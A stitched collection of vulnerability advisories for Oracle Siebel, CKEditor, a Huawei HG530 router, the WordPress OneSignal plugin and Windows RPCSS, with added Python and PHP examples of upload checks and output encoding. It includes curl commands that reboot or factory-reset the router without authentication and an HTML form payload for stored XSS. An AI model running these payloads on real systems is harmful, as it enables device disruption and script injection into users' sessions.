        # Solution: Apply the Oracle Siebel CRM patch released on 16 July 2019

        ########################################
        # Vulnerability Disclosure Timeline:
        2017-December-23: Discovered vulnerability
        2017-December-25: Vendor Notification
        2017-December-27: Vendor Response/Feedback
        2019-July-16: Vendor Fix/Patch
        2019-July-17: Public Disclosure
        ########################################

        Warm regards,
        Sarath Nair
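
A server-side counterpart to the issue described in the advisory above, as an added example (not code from the advisory or from Oracle): an allow-list check on uploaded attachments, plus response headers that force a download instead of in-browser rendering. The function names, the allow-list and the sample uploads are assumptions constructed for illustration.

```python
"""Attachment upload checks and download headers (illustrative, constructed)."""
import os
import re

# Assumption: the workflow only needs these attachment types. Anything a
# browser renders as a document (.html, .htm, .svg, .xml, ...) is left out.
ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".jpeg", ".docx", ".txt", ".csv"}

# Leading bytes expected for the binary formats on the allow-list.
MAGIC_BYTES = {
    ".pdf": b"%PDF-",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".docx": b"PK\x03\x04",
}

# Markup a browser could sniff and render if a "text" file were served inline.
ACTIVE_MARKUP = re.compile(
    rb"<\s*(?:!doctype|html|head|body|script|svg|iframe|object|embed|img)\b",
    re.IGNORECASE,
)
SNIFF_WINDOW = 4096  # bytes inspected at the start of text attachments


def normalised_extension(filename):
    """Lower-cased final extension, ignoring client paths and trailing dots/spaces."""
    base = os.path.basename(filename.replace("\\", "/"))
    base = base.rstrip(". ").lower()  # "x.html." and "x.html " are still .html
    return os.path.splitext(base)[1]


def check_upload(filename, data):
    """Return (accepted, reason) for an uploaded attachment."""
    if "\x00" in filename:
        return False, "nul-in-name"
    ext = normalised_extension(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension-not-allowed"
    magic = MAGIC_BYTES.get(ext)
    if magic is not None:
        # Binary type: the content must start with the format's signature.
        if not data.startswith(magic):
            return False, "content-mismatch"
    elif ACTIVE_MARKUP.search(data[:SNIFF_WINDOW]):
        # Text type: refuse files that open with renderable markup.
        return False, "active-markup"
    return True, "ok"


def download_headers(stored_name):
    """Headers that make the browser save an attachment instead of rendering it."""
    base = os.path.basename(stored_name.replace("\\", "/"))
    # Keep a conservative character set so the name cannot break the header.
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", base)[:100] or "attachment"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % safe,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


if __name__ == "__main__":
    # Constructed sample uploads, not taken from the advisory.
    samples = [
        ("note.html", b"<html><script>alert(1)</script></html>"),
        ("note.html.", b"<html><script>alert(1)</script></html>"),
        ("report.pdf", b"<html><script>alert(1)</script></html>"),
        ("notes.txt", b"hello <script>alert(1)</script>"),
        ("C:\\fakepath\\invoice.PDF", b"%PDF-1.4\n1 0 obj\n"),
    ]
    for name, body in samples:
        print(name, "->", check_upload(name, body))
    print(download_headers("invoice.PDF"))
```

The upload check and the download headers are independent layers: even a file that passes the allow-list is served as `application/octet-stream` with `nosniff`, so it is saved rather than rendered in the application's origin.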

        CKEditor CVE-2018-9861 Cross Site Scripting Vulnerability



        CKEditor is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
        Note: This issue was previously titled 'Drupal CKEditor Plugin Cross Site Scripting Vulnerability'. The title has been changed to better reflect the vulnerability information.
        An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
        CKEditor versions 4.5.10 through 4.9.1 are vulnerable; other versions may also be affected.

        Information

        Bugtraq ID: 103924
        Class: Input Validation Error
        CVE: CVE-2018-9861

        Remote: Yes
        Local: No
        Published: Apr 17 2018 12:00AM
        Updated: Jul 18 2019 11:00AM
        Credit: Kyaw Min Thein.
        Vulnerable: Oracle PeopleSoft Enterprise PeopleTools 8.57
        Oracle PeopleSoft Enterprise PeopleTools 8.56
        Oracle PeopleSoft Enterprise PeopleTools 8.55
        Drupal Drupal 8.5.1
        Drupal Drupal 8.5
        Drupal Drupal 8.4.6
        Drupal Drupal 8.4.5
        Drupal Drupal 8.4.4
        Drupal Drupal 8.4.3
        Drupal Drupal 8.4.2
        Drupal Drupal 8.4.1
        Drupal Drupal 8.4
        Drupal Drupal 8.3.9
        Drupal Drupal 8.3.8
        Drupal Drupal 8.3.7
        Drupal Drupal 8.3.6
        Drupal Drupal 8.3.5
        Drupal Drupal 8.3.4
        Drupal Drupal 8.3.3
        Drupal Drupal 8.3.2
        Drupal Drupal 8.3.1
        Drupal Drupal 8.2.8
        Drupal Drupal 8.2.7
        Drupal Drupal 8.2.3
        Drupal Drupal 8.2.2
        Drupal Drupal 8.2.1
        Drupal Drupal 8.2
        Drupal Drupal 8.1.10
        Drupal Drupal 8.1.9
        Drupal Drupal 8.1.8
        Drupal Drupal 8.0.4
        Drupal Drupal 8.0.3
        Drupal Drupal 8.0.2
        Drupal Drupal 8.0.1
        Drupal Drupal 8.1.7
        Drupal Drupal 8.1.6
        Drupal Drupal 8.1.5
        Drupal Drupal 8.1.4
        Drupal Drupal 8.1.3
        Drupal Drupal 8.1.0
        Drupal Drupal 8.0
        Ckeditor Ckeditor 4.9.1
        Ckeditor Ckeditor 4.9
        Ckeditor Ckeditor 4.8
        Ckeditor Ckeditor 4.7.3
        Ckeditor Ckeditor 4.7.2
        Ckeditor Ckeditor 4.7.1
        Ckeditor Ckeditor 4.7
        Ckeditor Ckeditor 4.6.2
        Ckeditor Ckeditor 4.6.1
        Ckeditor Ckeditor 4.6
        Ckeditor Ckeditor 4.5.11
        Ckeditor Ckeditor 4.5.10


        Not Vulnerable: Drupal Drupal 8.5.2
        Drupal Drupal 8.4.7
        Ckeditor Ckeditor 4.9.2


        Exploit


        Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.


          Huawei HG530 Reboot / Restore Authentication Bypass


          Huawei HG530 suffers from unauthenticated remote reboot and restore vulnerabilities.


          MD5 | 960066e7bdcc835fbc6e47444eb6a973

          Huawei HG530 Multiple Unauthenticated reboot and restore Vulnerability

          ===========================

          The Huawei HG530 suffers from multiple unauthenticated reboot and restore
          vulnerabilities that allow local attackers to reboot the device or to restore it to
          factory configuration without user interaction.

          ==================

          The vulnerability is located in form POST data parameter in
          'Restart_factory' via path '/Forms/bottom_restart_1'

          ====================

          Security issue PoC :

          1-Rebooting :

          curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d '
          defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=0'

          2-Restoring :

          curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d '
          defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=1'

          ========================

          WordPress OneSignal 1.17.5 Cross Site Scripting


          WordPress OneSignal plugin version 1.17.5 suffers from a persistent cross site scripting vulnerability.


          MD5 | 19cd11fce2ebe3bf42676b53160a66cb

          <!--

          WordPress Plugin OneSignal 1.17.5 Persistent Cross-Site Scripting


          Vendor: OneSignal
          Product web page: https://www.onesignal.com
          https://wordpress.org/plugins/onesignal-free-web-push-notifications/
          Affected version: 1.17.5

          Summary: OneSignal is a high volume and reliable push notification service
          for websites and mobile applications. We support all major native and mobile
          platforms by providing dedicated SDKs for each platform, a RESTful server API,
          and an online dashboard for marketers to design and send push notifications.

          Desc: The application suffers from an authenticated stored XSS via POST request.
          The issue is triggered when input passed via the POST parameter 'subdomain' is
          not properly sanitized before being returned to the user. This can be exploited
          to execute arbitrary HTML and script code in a user's browser session in context
          of an affected site.

          Tested on: WordPress 5.2.2
          Apache/2.4.39
          PHP/7.1.30


          Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
          @zeroscience


          Advisory ID: ZSL-2019-5530
          Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php


          17.07.2019

          -->


          <html>
          <body>
          <script>history.pushState('', 'SHPA', '/')</script>
          <form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
          <input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" />
          <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
          <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" />
          <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" />
          <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
          <input type="hidden" name="safari_web_id" value="" />
          <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
          <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
          <input type="hidden" name="persist_notifications" value="platform-default" />
          <input type="hidden" name="notification_title" value="hACKME" />
          <input type="hidden" name="notifyButton_enable" value="true" />
          <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
          <input type="hidden" name="notifyButton_prenotify" value="true" />
          <input type="hidden" name="notifyButton_showcredit" value="true" />
          <input type="hidden" name="notifyButton_customize_enable" value="true" />
          <input type="hidden" name="notifyButton_size" value="medium" />
          <input type="hidden" name="notifyButton_position" value="bottom-right" />
          <input type="hidden" name="notifyButton_theme" value="default" />
          <input type="hidden" name="notifyButton_offset_bottom" value="" />
          <input type="hidden" name="notifyButton_offset_left" value="" />
          <input type="hidden" name="notifyButton_offset_right" value="" />
          <input type="hidden" name="notifyButton_color_background" value="" />
          <input type="hidden" name="notifyButton_color_foreground" value="" />
          <input type="hidden" name="notifyButton_color_badge_background" value="" />
          <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
          <input type="hidden" name="notifyButton_color_badge_border" value="" />
          <input type="hidden" name="notifyButton_color_pulse" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
          <input type="hidden" name="notifyButton_message_prenotify" value="" />
          <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
          <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
          <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
          <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
          <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
          <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
          <input type="hidden" name="notifyButton_dialog_main_title" value="" />
          <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
          <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
          <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
          <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
          <input type="hidden" name="prompt_customize_enable" value="true" />
          <input type="hidden" name="prompt_action_message" value="" />
          <input type="hidden" name="prompt_auto_accept_title" value="" />
          <input type="hidden" name="prompt_site_name" value="" />
          <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
          <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
          <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
          <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
          <input type="hidden" name="prompt_example_notification_caption" value="" />
          <input type="hidden" name="prompt_accept_button_text" value="" />
          <input type="hidden" name="prompt_cancel_button_text" value="" />
          <input type="hidden" name="send_welcome_notification" value="true" />
          <input type="hidden" name="welcome_notification_title" value="" />
          <input type="hidden" name="welcome_notification_message" value="" />
          <input type="hidden" name="welcome_notification_url" value="" />
          <input type="hidden" name="notification_on_post" value="true" />
          <input type="hidden" name="utm_additional_url_params" value="" />
          <input type="hidden" name="allowed_custom_post_types" value="" />
          <input type="hidden" name="custom_manifest_url" value="" />
          <input type="hidden" name="show_notification_send_status_message" value="true" />
          <input type="submit" value="Send" />
          </form>
          </body>
          </html>
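
The defensive counterpart to the PoC above, as an added example that is not part of the advisory or the plugin's own code. It assumes the stored 'subdomain' value is echoed back into an input's value attribute (as the `">` prefix of the payload suggests) and that a valid value is a single DNS label; all function names are hypothetical.

```php
<?php
// Added example: hypothetical settings-field handling, not the plugin's code.

// Vulnerable pattern: the stored value is concatenated into an attribute
// without encoding, so a double quote in the value ends the attribute.
function render_subdomain_field_unsafe(string $stored): string
{
    return '<input type="text" name="subdomain" value="' . $stored . '" />';
}

// Input side: accept only a single DNS label (assumed rule for this field).
function sanitize_subdomain(string $raw): string
{
    $value = strtolower(trim($raw));
    // Letters and digits, hyphens only in the middle, 1 to 63 characters.
    if (preg_match('/^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/', $value) !== 1) {
        return ''; // reject instead of trying to repair hostile input
    }
    return $value;
}

// Output side: encode for the HTML attribute context on every render,
// even if the value was validated when it was saved.
// In WordPress, esc_attr() is the function for this context.
function render_subdomain_field_safe(string $stored): string
{
    $encoded = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="subdomain" value="' . $encoded . '" />';
}

// The value from the PoC form above, as it would arrive in the POST body.
$posted = '"><script>confirm(251)</script>';

// Unsafe render: the markup after the quote becomes live HTML.
echo render_subdomain_field_unsafe($posted), PHP_EOL;

// Safe render: quotes and angle brackets are emitted as entities.
echo render_subdomain_field_safe($posted), PHP_EOL;

// Validation on save: the PoC value is rejected, a plain label is kept.
var_dump(sanitize_subdomain($posted));
var_dump(sanitize_subdomain('MySite'));
```

Validation on save and encoding on output are both needed: values stored before the fix, or written by another code path, are only neutralised by the output encoding.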

          Microsoft Windows RPCSS Activation Kernel Security Callback Privilege Escalation

          On Microsoft Windows, the RPCSS Activation Kernel RPC server's security callback can be bypassed, resulting in elevation of privilege.


          MD5 | c4819f99e884719a97eddb52654d624b

